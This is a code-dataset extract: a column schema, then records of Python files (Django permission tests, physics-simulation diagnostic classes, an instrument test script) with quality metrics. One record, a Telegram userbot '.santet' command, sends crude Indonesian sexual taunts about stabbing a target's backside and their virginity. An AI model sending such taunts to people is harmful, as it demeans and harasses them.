Schema for each record in this extract (113 columns; the per-record values later in this section follow this order):

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
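Consumers typically filter on these columns before using `content`. A minimal sketch, assuming the rows have been materialized locally as a Parquet file; the `sample.parquet` name and the 0.5 threshold are illustrative, not part of the dataset:

```python
import pandas as pd

# Hypothetical local copy of the table described by the schema above.
df = pd.read_parquet("sample.parquet")

# Keep Python files whose AST category signal is set (presumably: the file
# parses) and that are not dominated by near-duplicate 5-grams.
mask = (
    (df["lang"] == "Python")
    & (df["qsc_codepython_cate_ast_quality_signal"] == 1)
    & (df["qsc_code_frac_chars_dupe_5grams_quality_signal"] < 0.5)
)
print(df.loc[mask, ["max_stars_repo_name", "max_stars_repo_path", "size"]])
```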
**Record 1: `newsletter/tests/tests_post_update_view.py`**

- hexsha: 42563137040a63ac1825149675ebdbdc98177c75, size: 9,019, ext: py, lang: Python
- repo (identical for the max_stars/max_issues/max_forks variants): hbuyse/dj-newsletter @ 2c032466e648b3c844bea6aae379a5346d9ce677, licenses ["MIT"]
- max_stars_count, max_issues_count, max_forks_count and all event datetimes: null

`content`:

```python
#! /usr/bin/env python
# coding=utf-8
"""Tests the modification view of a post."""
# Django
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.test import TestCase, override_settings, tag
from django.urls import reverse
# Current django project
from newsletter.models import Post
from newsletter.tests.utils import create_user
@override_settings(LOGIN_URL="/toto/")
@tag('post', 'view', 'update', 'anonymous')
class TestPostUpdateViewAsAnonymous(TestCase):
"""Tests the modification view of a post as an anonymous user."""
@classmethod
def setUpTestData(cls):
"""Set up for all the following tests."""
cls.dict, cls.user = create_user()
d = {
'author': cls.user,
'text': 'Text',
'title': 'Title'
}
cls.post = Post.objects.create(**d)
def test_get_redirected_to_login(self):
"""Get should be redirected to the login page."""
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertRedirects(response, "/toto/?next=/{}/update/".format(self.post.id), fetch_redirect_response=False)
def test_post_redirected_to_login(self):
"""Post should be redirected to the login page."""
d = {
'title': 'My title'
}
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), d)
self.assertRedirects(response, "/toto/?next=/{}/update/".format(self.post.id), fetch_redirect_response=False)
@tag('post', 'view', 'update', 'logged')
class TestPostUpdateViewAsLogged(TestCase):
"""Tests."""
@classmethod
def setUpTestData(cls):
"""Set up for all the following tests."""
cls.dict, cls.user = create_user()
d = {
'author': cls.user,
'text': 'Text',
'title': 'Title'
}
cls.post = Post.objects.create(**d)
def test_posts_create_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertEqual(response.status_code, 403)
def test_posts_create_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
d = {
'text': 'Text',
'title': 'My title'
}
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), d)
self.assertEqual(response.status_code, 403)
def test_posts_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertFalse(self.user.has_perm('newsletter.change_post'))
self.user.user_permissions.add(Permission.objects.get(name='Can change post'))
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertEqual(response.status_code, 200)
def test_posts_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
perms = 'newsletter.change_post'
d = {
'text': 'Text',
'title': 'My title'
}
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertFalse(self.user.has_perm(perms))
self.user.user_permissions.add(Permission.objects.get(codename=perms.split('.')[1]))
# Permission caching (https://docs.djangoproject.com/en/2.1/topics/auth/default/#permission-caching)
# Need to refetch the user to get the new permissions
self.user = get_user_model().objects.get(id=self.user.id)
self.assertTrue(self.user.has_perm(perms))
# Next test
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), data=d)
self.assertEqual(len(Post.objects.all()), 1)
self.assertRedirects(response, "/{}/{}/{}/{}/".format(self.post.created.year, self.post.created.month, self.post.created.day, self.post.id), fetch_redirect_response=False)
@tag('post', 'view', 'update', 'staff')
class TestPostUpdateViewAsStaff(TestCase):
"""Tests."""
@classmethod
def setUpTestData(cls):
"""Set up for all the following tests."""
cls.dict, cls.user = create_user(staff=True)
d = {
'author': cls.user,
'text': 'Text',
'title': 'Title'
}
cls.post = Post.objects.create(**d)
def test_posts_create_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertEqual(response.status_code, 403)
def test_posts_create_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
d = {
'text': 'Text',
'title': 'My title'
}
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), d)
self.assertEqual(response.status_code, 403)
def test_posts_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertFalse(self.user.has_perm('newsletter.change_post'))
self.user.user_permissions.add(Permission.objects.get(name='Can change post'))
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertEqual(response.status_code, 200)
def test_posts_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
perms = 'newsletter.change_post'
d = {
'text': 'Text',
'title': 'My title'
}
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertFalse(self.user.has_perm(perms))
self.user.user_permissions.add(Permission.objects.get(codename=perms.split('.')[1]))
# Permission caching (https://docs.djangoproject.com/en/2.1/topics/auth/default/#permission-caching)
# Need to refetch the user to get the new permissions
self.user = get_user_model().objects.get(id=self.user.id)
self.assertTrue(self.user.has_perm(perms))
# Next test
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), data=d)
self.assertEqual(len(Post.objects.all()), 1)
self.assertRedirects(response, "/{}/{}/{}/{}/".format(self.post.created.year, self.post.created.month, self.post.created.day, self.post.id), fetch_redirect_response=False)
@tag('post', 'view', 'update', 'superuser')
class TestPostUpdateViewAsSuperuser(TestCase):
"""Tests the modification of a post as superuser.
Unlike simple user or staff user, superuser already has the rights to do whatever he/she wants.
"""
@classmethod
def setUpTestData(cls):
"""Set up for all the following tests."""
cls.dict, cls.user = create_user(superuser=True)
d = {
'author': cls.user,
'text': 'Text',
'title': 'Title'
}
cls.post = Post.objects.create(**d)
def test_posts_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertTrue(self.user.has_perm('newsletter.change_post'))
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertEqual(response.status_code, 200)
def test_posts_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
perms = 'newsletter.change_post'
d = {
'text': 'Text',
'title': 'My title'
}
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertTrue(self.user.has_perm(perms))
# Next test
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), data=d)
self.assertEqual(len(Post.objects.all()), 1)
self.assertRedirects(response, "/{}/{}/{}/{}/".format(self.post.created.year, self.post.created.month, self.post.created.day, self.post.id), fetch_redirect_response=False)
```

- avg_line_length: 41.562212, max_line_length: 179, alphanum_fraction: 0.649074
- *_quality_signal columns (qsc_code_num_words through qsc_codepython_frac_lines_print, schema order): 1,108 | 9,019 | 5.150722 | 0.123646 | 0.037848 | 0.029788 | 0.056772 | 0.87419 | 0.87419 | 0.87419 | 0.850359 | 0.850359 | 0.850359 | 0 | 0.004284 | 0.197694 | 9,019 | 216 | 180 | 41.75463 | 0.784411 | 0.105777 | 0 | 0.785714 | 0 | 0 | 0.126292 | 0.05571 | 0 | 0 | 0 | 0 | 0.235714 | 1 | 0.114286 | false | 0.071429 | 0.042857 | 0 | 0.185714 | 0
- unsuffixed qsc_* columns (same order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0
- effective: 0, hits: 8
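These tests import `create_user` from `newsletter.tests.utils`, which is not part of this record. A hypothetical sketch of such a helper, inferred only from how the tests call it (it must return a credentials dict plus the created user, and accept `staff`/`superuser` flags); the real dj-newsletter helper may differ:

```python
from django.contrib.auth import get_user_model

def create_user(staff=False, superuser=False):
    """Hypothetical test helper: returns ({'username', 'password'}, user)."""
    creds = {"username": "tester", "password": "s3cret-pass"}
    User = get_user_model()
    if superuser:
        user = User.objects.create_superuser(email="tester@example.com", **creds)
    else:
        user = User.objects.create_user(**creds)
        if staff:
            user.is_staff = True
            user.save()
    return creds, user
```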
**Record 2: `examples/__init__.py`**

- hexsha: 42576335c0f6ef9464d52ec52b4c65d3223584ba, size: 155, ext: py, lang: Python
- repo (all variants): nprezant/GAlgorithm @ 5259281fb7ed0efe1effcdc39ae1850c0a47b9a5, licenses ["MIT"]
- max_stars_count: 1 (2021-12-18T23:25:12.000Z to 2021-12-18T23:25:12.000Z)
- max_issues_count: 1 (2022-03-12T01:04:13.000Z to 2022-03-12T01:04:13.000Z)
- max_forks_count: null (event datetimes null)

`content`:

```python
from .knapsack import run as run_knapsack
from .sentences import run as run_sentences
from .tsp import run as run_tsp
from .tsp import plot_individual_csv
```

- avg_line_length: 31, max_line_length: 43, alphanum_fraction: 0.832258
- *_quality_signal columns (qsc_code_num_words through qsc_codepython_frac_lines_print, schema order): 27 | 155 | 4.592593 | 0.37037 | 0.217742 | 0.266129 | 0.33871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141935 | 155 | 4 | 44 | 38.75 | 0.932331 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0
- unsuffixed qsc_* columns (same order): 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0
- effective: 0, hits: 8
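The package body just re-exports each demo's entry point under a stable name, so callers can presumably invoke them directly (illustrative):

```python
from examples import run_knapsack, run_sentences, run_tsp

run_knapsack()  # each run_* function presumably drives one GAlgorithm demo end-to-end
```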
**Record 3: `PICMI_Python/diagnostics.py`**

- hexsha: 425b3d3b0191cb00f54e08a9c5379d86146c6d14, size: 9,504, ext: py, lang: Python
- repo (all variants): tsung1029/picmi @ ca94beaec18759d0ed45d54ac4dd0917a7edd50f, licenses ["BSD-3-Clause-LBNL"]
- max_stars_count, max_issues_count, max_forks_count and all event datetimes: null

`content`:

```python
"""Classes following the PICMI standard
These should be the base classes for Python implementation of the PICMI standard
The classes in the file are all diagnostics related
"""
from .base import _ClassWithInit
# ----------------------------
# Simulation frame diagnostics
# ----------------------------
class PICMI_FieldDiagnostic(_ClassWithInit):
"""
Defines the electromagnetic field diagnostics in the simulation frame
- grid: Grid object for the diagnostic
- period=1: Period of time steps that the diagnostic is performed
- data_list=["rho", "E", "B", "J"]: List of quantities to write out
- write_dir='.': Directory where data is to be written
- step_min=None: Minimum step at which diagnostics could be written (optional)
Defaults to step 0.
- step_max=None: Maximum step at which diagnostics could be written (optional)
Defaults to no limit.
- number_of_cells=None: Number of cells in each dimension (optional)
If not given, will be obtained from grid.
- lower_bound=None: Lower corner of diagnostics box in each direction (optional)
If not given, will be obtained from grid.
- upper_bound=None: Higher corner of diagnostics box in each direction (optional)
If not given, will be obtained from grid.
- parallelio=None: If set to True, field diagnostics are dumped in parallel (optional)
- name: Sets the base name for the diagnostic output files (optional)
"""
def __init__(self, grid, period = 1,
data_list = ["rho", "E", "B", "J"],
write_dir = None,
step_min = None,
step_max = None,
number_of_cells = None,
lower_bound = None,
upper_bound = None,
parallelio = None,
name = None,
**kw):
self.grid = grid
self.period = period
self.data_list = data_list
self.write_dir = write_dir
self.step_min = step_min
self.step_max = step_max
if number_of_cells is None:
number_of_cells = grid.number_of_cells
if lower_bound is None:
lower_bound = grid.lower_bound
if upper_bound is None:
upper_bound = grid.upper_bound
self.number_of_cells = number_of_cells
self.lower_bound = lower_bound
self.upper_bound = upper_bound
self.parallelio = parallelio
self.name = name
self.handle_init(kw)
class PICMI_ElectrostaticFieldDiagnostic(_ClassWithInit):
"""
Defines the electrostatic field diagnostics in the simulation frame
- grid: Grid object for the diagnostic
- period=1: Period of time steps that the diagnostic is performed
- data_list=["rho", "phi"]: List of quantities to write out
- write_dir='.': Directory where data is to be written
- step_min=None: Minimum step at which diagnostics could be written (optional)
Defaults to step 0.
- step_max=None: Maximum step at which diagnostics could be written (optional)
Defaults to no limit.
- number_of_cells=None: Number of cells in each dimension (optional)
If not given, will be obtained from grid.
- lower_bound=None: Lower corner of diagnostics box in each direction (optional)
If not given, will be obtained from grid.
- upper_bound=None: Higher corner of diagnostics box in each direction (optional)
If not given, will be obtained from grid.
- parallelio=None: If set to True, field diagnostics are dumped in parallel (optional)
- name: Sets the base name for the diagnostic output files (optional)
"""
def __init__(self, grid, period = 1,
data_list = ["rho", "phi"],
write_dir = None,
step_min = None,
step_max = None,
number_of_cells = None,
lower_bound = None,
upper_bound = None,
parallelio = None,
name = None,
**kw):
self.grid = grid
self.period = period
self.data_list = data_list
self.write_dir = write_dir
self.step_min = step_min
self.step_max = step_max
if number_of_cells is None:
number_of_cells = grid.number_of_cells
if lower_bound is None:
lower_bound = grid.lower_bound
if upper_bound is None:
upper_bound = grid.upper_bound
self.number_of_cells = number_of_cells
self.lower_bound = lower_bound
self.upper_bound = upper_bound
self.parallelio = parallelio
self.name = name
self.handle_init(kw)
class PICMI_ParticleDiagnostic(_ClassWithInit) :
"""
Defines the particle diagnostics in the simulation frame
- period=1: Period of time steps that the diagnostic is performed
- species: Species or list of species to write out
Note that the name attribute must be defined for the species.
- data_list=["position", "momentum", "weighting"]: The data to be written out
- write_dir='.': Directory where data is to be written
- step_min=None: Minimum step at which diagnostics could be written (optional)
Defaults to step 0.
- step_max=None: Maximum step at which diagnostics could be written (optional)
Defaults to no limit.
- parallelio=None: If set to True, particle diagnostics are dumped in parallel (optional)
- name: Sets the base name for the diagnostic output files (optional)
"""
def __init__(self, period = 1,
species = None,
data_list = ["position", "momentum", "weighting"],
write_dir = None,
step_min = None,
step_max = None,
parallelio = None,
name = None,
**kw):
self.period = period
self.species = species
self.data_list = data_list
self.write_dir = write_dir
self.step_min = step_min
self.step_max = step_max
self.parallelio = parallelio
self.name = name
self.handle_init(kw)
# ----------------------------
# Lab frame diagnostics
# ----------------------------
class PICMI_LabFrameFieldDiagnostic(_ClassWithInit):
"""
Defines the electromagnetic field diagnostics in the lab frame
- grid: Grid object for the diagnostic
- num_snapshots: Number of lab frame snapshots to make
- dt_snapshots: Time between each snapshot in lab frame
- z_subsampling=1: A factor which is applied on the resolution of the lab frame reconstruction. (integer)
- time_start=0.: Time for the first snapshot in lab frame
- data_list=["rho", "E", "B", "J"]: List of quantities to write out
- write_dir='.': Directory where data is to be written
- parallelio=None: If set to True, field diagnostics are dumped in parallel (optional)
- name: Sets the base name for the diagnostic output files (optional)
"""
def __init__(self, grid, num_snapshots, dt_snapshots,
z_subsampling = 1, time_start = 0.,
data_list = ["rho", "E", "B", "J"],
write_dir = None,
parallelio = None,
name = None,
**kw):
self.grid = grid
self.num_snapshots = num_snapshots
self.dt_snapshots = dt_snapshots
self.z_subsampling = z_subsampling
self.time_start = time_start
self.data_list = data_list
self.write_dir = write_dir
self.parallelio = parallelio
self.name = name
self.handle_init(kw)
class PICMI_LabFrameParticleDiagnostic(_ClassWithInit):
"""
Defines the particle diagnostics in the lab frame
- grid: Grid object for the diagnostic
- num_snapshots: Number of lab frame snapshots to make
- dt_snapshots: Time between each snapshot in lab frame
- time_start=0.: Time for the first snapshot in lab frame
- species: Species or list of species to write out
Note that the name attribute must be defined for the species.
- data_list=["position", "momentum", "weighting"]: The data to be written out
- write_dir='.': Directory where data is to be written
- parallelio=None: If set to True, particle diagnostics are dumped in parallel (optional)
- name: Sets the base name for the diagnostic output files (optional)
"""
def __init__(self, grid, num_snapshots, dt_snapshots,
time_start = 0.,
species = None,
data_list = ["position", "momentum", "weighting"],
write_dir = None,
parallelio = None,
name = None,
**kw):
self.grid = grid
self.num_snapshots = num_snapshots
self.dt_snapshots = dt_snapshots
self.time_start = time_start
self.species = species
self.data_list = data_list
self.write_dir = write_dir
self.parallelio = parallelio
self.name = name
self.handle_init(kw)
```

- avg_line_length: 40.442553, max_line_length: 111, alphanum_fraction: 0.598906
- *_quality_signal columns (qsc_code_num_words through qsc_codepython_frac_lines_print, schema order): 1,149 | 9,504 | 4.793734 | 0.114012 | 0.029049 | 0.037763 | 0.023965 | 0.900871 | 0.898148 | 0.890886 | 0.871641 | 0.856935 | 0.849855 | 0 | 0.002331 | 0.322917 | 9,504 | 234 | 112 | 40.615385 | 0.853613 | 0.502841 | 0 | 0.905983 | 0 | 0 | 0.015493 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042735 | false | 0 | 0.008547 | 0 | 0.094017 | 0
- unsuffixed qsc_* columns (same order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
- effective: 0, hits: 7
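The class docstrings above double as the parameter reference for these diagnostics. A minimal construction sketch against this module, assuming the package is importable and that `_ClassWithInit.handle_init` accepts an empty keyword dict; the period and data_list values are illustrative:

```python
from PICMI_Python.diagnostics import PICMI_ParticleDiagnostic

# A real setup would pass a species object; None is the documented default.
diag = PICMI_ParticleDiagnostic(
    period=10,                           # write every 10 steps
    data_list=["position", "momentum"],  # subset of the documented default list
    write_dir="diags",
    name="particles",
)
print(diag.period, diag.data_list, diag.name)
```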
**Record 4: `userbot/modules/santet.py`**

- hexsha: 35f337cabf4e34a760d82d0a8d08836f379ad0fe, size: 9,884, ext: py, lang: Python
- repo (all variants): bryanasfuk/Venom @ 8ac37b718786f05a9ea63418509c41d148e3ec54, licenses ["Naumen", "Condor-1.1", "MS-PL"]
- max_stars_count, max_issues_count, max_forks_count and all event datetimes: null

`content`:

```python
from time import sleep
from userbot import CMD_HELP
from userbot.events import register
@register(outgoing=True, pattern=r"^\.santet(?: |$)(.*)")
async def typewriter(typew):
    typew.pattern_match.group(1)  # the command's argument is read but never used
    await typew.edit("`Telah Mengaktifkan Perintah Mencolok Bool 😈`")  # Indonesian, roughly: "prank command activated"
    sleep(2)
    await typew.edit("`Mencari Bool Orang Ini...`")  # roughly: "looking for this person..."
    sleep(1)
    await typew.edit("`Pertusukan Akan Segera Dilakukan`")  # roughly: "the jab will happen shortly"
    sleep(1)
    await typew.edit("`Sange Aktifkan`")  # roughly: "switched on"
    sleep(1)
await typew.edit("0%")
    # Animate a unicode progress bar from 1% to 100% by editing the message in
    # place: one full block per six percentage points, plus a partial-block
    # character for the remainder.
    partials = ["", "▎", "▍", "▌", "▊", "▉"]
    for number in range(1, 101):
        blocks, rem = divmod(number, 6)
        await typew.edit("{}% {}".format(number, "█" * blocks + partials[rem]))
        sleep(0.03)  # time.sleep blocks the event loop; asyncio.sleep would not
sleep(1)
    await typew.edit(
        "`Bool Sudah Tertusuk Hahahaha Selamat Bool Anda Sudah Tidak Perawan`"  # closing prank message, in Indonesian
    )


CMD_HELP.update(
    {
        "santet": "`.santet`\
\nUsage: Canda Bool."  # "canda" is Indonesian for "joke"
    }
)
```

- avg_line_length: 29.951515, max_line_length: 78, alphanum_fraction: 0.490996
- *_quality_signal columns (qsc_code_num_words through qsc_codepython_frac_lines_print, schema order): 1,288 | 9,884 | 4.45264 | 0.118012 | 0.18483 | 0.258762 | 0.296425 | 0.783435 | 0.765475 | 0.765475 | 0.765475 | 0.765475 | 0.765475 | 0 | 0.055847 | 0.26811 | 9,884 | 329 | 79 | 30.042553 | 0.614598 | 0 | 0 | 0.62963 | 0 | 0 | 0.151963 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009259 | 0 | 0.009259 | 0
- unsuffixed qsc_* columns (same order): 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
- effective: 0, hits: 7
**Record 5: `xoto3/utils/env.py`**

- hexsha: c452b1ea9d189c19299de37f7eaab4fc51b3c640, size: 83, ext: py, lang: Python
- repo (all variants): xoeye/xoto3 @ ef91cde3cce81e1ded311389358271d5c8eba02b, licenses ["MIT"]
- max_stars_count: 16 (2020-05-23T15:23:38.000Z to 2022-03-18T19:28:37.000Z)
- max_issues_count: 9 (2020-08-19T23:08:36.000Z to 2021-10-06T17:16:35.000Z)
- max_forks_count: 2 (2020-12-12T08:23:53.000Z to 2021-09-03T20:25:54.000Z)

`content`:

```python
import os
def is_aws_env() -> bool:
return "AWS_EXECUTION_ENV" in os.environ
```

- avg_line_length: 13.833333, max_line_length: 44, alphanum_fraction: 0.710843
- *_quality_signal columns (qsc_code_num_words through qsc_codepython_frac_lines_print, schema order): 14 | 83 | 3.928571 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192771 | 83 | 5 | 45 | 16.6 | 0.820896 | 0 | 0 | 0 | 0 | 0 | 0.204819 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0
- unsuffixed qsc_* columns (same order): 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0
- effective: 0, hits: 7
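`AWS_EXECUTION_ENV` is set by AWS-managed runtimes such as Lambda, so the helper works as a cheap deployment guard. An illustrative use (the branch contents are mine, not the library's):

```python
from xoto3.utils.env import is_aws_env

# Illustrative branch: pick a config source depending on where the code runs.
if is_aws_env():
    config_source = "lambda environment variables"
else:
    config_source = "local .env file"
print("loading config from", config_source)
```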
**Record 6: `Source_Code/Python/conducted_script_testing.py`**

- hexsha: c46bd91f5613b1afefdb1e03f00332e62a31b433, size: 7,206, ext: py, lang: Python
- repo (all variants): fenglwh/instruments @ 7886158d1ed97fe6bfe372a55f4fca107e834311, licenses ["MIT"]
- max_stars_count: null
- max_issues_count: 3 (2018-09-21T00:57:21.000Z to 2018-09-21T01:49:40.000Z)
- max_forks_count: null

`content`:

```python
import time
from labinstrument.SS.CMW500.CMW500_WIFI.CMW500_WIFI import CMW_WIFI
import openpyxl
if __name__ == '__main__':
instrument=CMW_WIFI(17)
print(instrument.uddrate_mode)
print(instrument.DSSS_rate)
print(instrument.OFDM_rate)
print(instrument.OMCS_rate)
instrument.tx_modulation_format='DSSS'
tech_2g_power=1
tech_5g_power=0
tech_2g_sensitivity=0
tech_5g_sensitivity=0
if tech_2g_power:
wb=openpyxl.Workbook()
ws=wb.worksheets[0]
row_count=1
for standard in ['BSTD','GSTD','GNST']:
for channel in [1,6,13]:
instrument.signal_off()
instrument.standard = standard
instrument.channel = channel
if standard=='BSTD':
instrument.tx_modulation_format='DSSS'
instrument.uddrate_mode='True'
instrument.DSSS_rate='DIS,DIS,DIS,MAND'
instrument.MFR_control_rate='ENAB,NHT,C11M'
instrument.DFR_control_rate='ENAB,NHT,BW20,C11M,LONG'
instrument.write('CONFigure:WLAN:MEAS:ISIGnal:STANdard DSSS')
elif standard=='GSTD':
instrument.tx_modulation_format='OFDM'
instrument.uddrate_mode='True'
instrument.DSSS_rate='DIS,DIS,DIS,DIS'
